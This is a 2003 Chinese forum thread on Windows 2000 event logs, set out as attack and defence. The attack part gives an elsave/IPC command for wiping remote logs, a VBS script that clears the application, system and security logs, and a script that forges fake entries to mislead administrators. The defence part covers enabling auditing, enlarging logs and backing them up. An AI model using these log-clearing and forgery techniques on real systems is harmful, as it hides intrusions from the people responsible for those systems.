说日志

suncon · 发表于 2003-10-18 21:17:00

说日志

写日记的读者一定深有体会，平时把事情记下来，到查看的时候就很方便。计算机也是如此，把一些关键性的用户行为加以记载备案，可以极大地方便系统管理员对系统情况进行掌握。尤其对一个网络管理员来讲，当系统的一举一动都在你掌握之中时，又会怕什么呢？反之，对于别有用心的黑客或攻击者，日志的正常运行无异于一个噩梦。如同江洋大盗希望“踏雪无痕”一样，攻击者的梦想就是让日志不再开口说话。总之，无论正邪高手，对日志问题都是空间重视的。下面的内容，都已在Windows 2000 Server及其以上系统中测试通过！

认识Windows日志

闲话少说，先来看看Windows系统的日志对一个网管的重要性：它记录着系统各项服务的各个细节（包括启动、运行、关闭、错误等各种信息）以及对本地系统的访问情况，从日志中一个有经验的网管可以很轻松地找出不属于“该发生”的事情，并根据线索追查到攻击者。

为了达到这样的目的，Windows系统对日志服务做了很严格而全面的分类，即分为应用程序日志、安全日志、系统日志、DNS服务器日志、FTP服务器日志和IIS服务器日志等。同时，为了保护日志的有效安全，在一般情况下，日志文件是处于严密保护之下的，普通用户不能随意更改，不能用普通编辑器编辑，甚至不能对它进行重命名、删除等操作，否则系统提示“访问被拒绝”！例如，启动Windows 2000时，事件日志服务会自动启动，所有用户都可以查看“应用程序日志”，但是只有系统管理员才能访问“安全日志”和“系统日志”。

小提示：Windows 2000默认情况下会关闭“安全日志”，那需要在“开始”→“运行”中输入“gpedit.msc”启动“组策略”，然后来启用安全日志（具体开启方法见下文）。一旦开启，它就会持续记录，直到达到设定的日志文件大小为止。

suncon · 发表于 2003-10-18 21:19:00

在Windows 2000系统中，系统的各种日志文件存放位置如下：

应用程序日志、安全日志、系统日志、DNS日志默认位置都在%systemroot%\sys tem32\config，默认文件大小512KB，但这大小无法持续长时间进行记录，有经验的管理员一般都会修改的。而IIS服务FTP日志默认位置是在%systemroot%\system32\logfiles\msftpsvc1，IIS服务WWW日志默认位置则位于%systemroot%\system32\logfiles\w3svc1。
具体的文件名则是：
安全日志文件：%systemroot%\system32\config\SecEvent.EVT。
系统日志文件：%systemroot%\system32\config\SysEvent.EVT。
应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT。
Scheduler服务器日志文件是%systemroot%\schedlgu.txt（该日志记录了访问者的IP，访问的时间及请求访问的内容）。

小提示：我们只要选控制面板→管理工具→时间查看器，就可以观察应用程序日志、安全日志、系统日志、DNS服务器日志。服务器日志请在相应的服务器配置程序中查看。

图1

要让系统能主动管理日志文件，必须要在注册表中注册，所以这些文件还在注册表的HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog处做了登记。同时，Windows 2000中提供了一个叫做安全日志分析器(CyberSafe Log Analyst，CLA)的工具，通过分类的方式将各种事件整理好，让管理员能迅速找到所需要的条目。

suncon · 发表于 2003-10-18 21:19:00

日志攻防战（以下操作在Windows2000 Advanced Server中通过）

1.攻——让日志死去吧

要让日志死掉不说话是很难的，因为日志是由系统来管理、保护的，一般情况下是禁止删除或修改。此外，它还与注册表密切相关，所以在Windows 2000中删除日志首先要取得系统管理员权限，因为安全日志和系统日志必须由系统管理员方可查看，然后才可以删除它们（或者停掉这些服务），而安全日志的删除就更为麻烦。

这里可以借助一个第三方软件来实现，那就是小榕的elsave：在获得系统管理员权限后，与对方建立IPC管理会话，输入net use \\对方IP pass /user: user，然后输入elsave -s \\对方IP -l application -C，这样就删除了安全日志。

当然，达人级的攻击者还会利用VBS脚本来达到目的，代码如下：
cleanevent.vbs
strComputer = .
Set objWMIService = GetObject（winmgmts: _
{impersonationLevel=impersonate,（Backup）}!\\ _
strComputer \root\cimv2）
dim mylogs（3）
mylogs（1）=application
mylogs（2）=system
mylogs（3）=security
for Each logs in mylogs
Set colLogFiles = objWMIService.ExecQuery _
（Select * from Win32_NTEventLogFile where LogFileName=’logs’）
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog（）
Next
next

然后他要做的是重新建立假的日志（要是日志突然什么都没有了，再笨的管理员也知道发生什么了），一样使用VBS脚本：
createlog.vbs
set ws=wscript.createobject(Wscript.shell)
ws.logevent 0 ,write log success

关键在于“logevent”后的数字参数。0代表成功执行，1代表执行出错，2代表警告，4代表信息，8代表成功审计，16代表故障审计。所以上面代码中，把0改为1、2、4、8和16均可，引号下的为日志描述，想怎么写都成，当然用点心骗网管是最好的。

这种方法有点麻烦，但不知道为什么，比尔.盖茨在XP系统中了为了方便广大黑客哥们，居然提供了一个更方便的工具eventcreate.exe，晕~

suncon · 发表于 2003-10-18 21:22:00

2.防——你以为我不知道？

Win2000自带了相当强大的安全日志系统，从用户登录到特权的使用都有非常详细的记录，可惜的是，默认安装下安全审核是关闭的。我们要做的第一步是进入系统的“管理工具”，在“本地安全策略”中打开“本地策略/审核策略”(或选“开始”菜单，选“运行”，输入gpedit.msc开启组策略，选“本地计算机策略”→“计算机配置”→“Windows设置”→“安全设置”→“本地策略”→“审核策略”），在要打开的策略上点击鼠标右键，选择“安全性”，之后复选“成功”和“失败”，即可开启需要的审核(图2)。

图2

然后要做的就是更好的利用和保护日志文件。首先更改日志文件的默认大小，在注册表中HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog对应的每个日志的maxsize子键处修改日志文件默认大小（图3），防止达到文件尺寸上限停止记录（也可在事件查看器中进行设置，如图4）。

图3

图4

当然也可以利用脚本技术来实现，这里不再多讲，有兴趣的朋友可以自己尝试一下。

suncon · 发表于 2003-10-18 21:22:00

接着就是日志的查询和备份了。如果没有经常性的备份，日志一旦被入侵者删除更改的话，会相当被动。这里推荐使用微软出的dumpel.exe工具，例如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式：
dumpel \\server -l system -f backupsystem.log

再利用计划任务可以实现定期备份系统日志。

制定一个安全日志的检查机制也是非常重要的。推荐的检查时间是每天上午，这是因为，入侵者喜欢夜间行动（月黑风高黑人夜呀）。当然，要想迅速从繁多的日志文件记录中查找到入侵信息，就要使用一些专业的日志管理工具。例如Surfstats Log Analyzer等。

如此下来，江湖上的风浪，不知道是更大，还是更平静了呢？

编后语：不推荐使用脚本编写程序用电子邮件发送安全日志，因为入侵者一样可以修改该脚本发送伪造的日志，让在远程的你满以为天下太平。当然，要想迅速从繁多的日志文件记录中查找到入侵信息，那就要使用一些专业的日志管理工具，如Surfstats Log Analyzer，此乃后话，还是下次给大家写吧。

----------------------------------------------------

相关工具下载：
ResourceKit下载，文中多个工具在这个包里
http://www.cnyhw.com/news/newsxt/yhwnews/list.asp?id=387
Surfstats Log Analyzer 下载
http://www.ttdown.com/SoftView/SoftView_8312.html
EventCreate工具
xp下系统自带的……
elsave 下载：
http://bhole.pc37.org/Download/Log/030504-Elsave.htm

88tyq · 发表于 2012-4-9 23:56:52

说日志

说日志

说日志

说日志

说日志

发表回复

浏览过的版块


热搜: 防雾膜棒料红外反射膜光电二极管镀膜机反射膜光谱仪光电探头真空镀银滤光片光器件应用光学 zemax激光远心镜头 sio2 增透膜离子源栅网 zemax 论文高反膜半反半透膜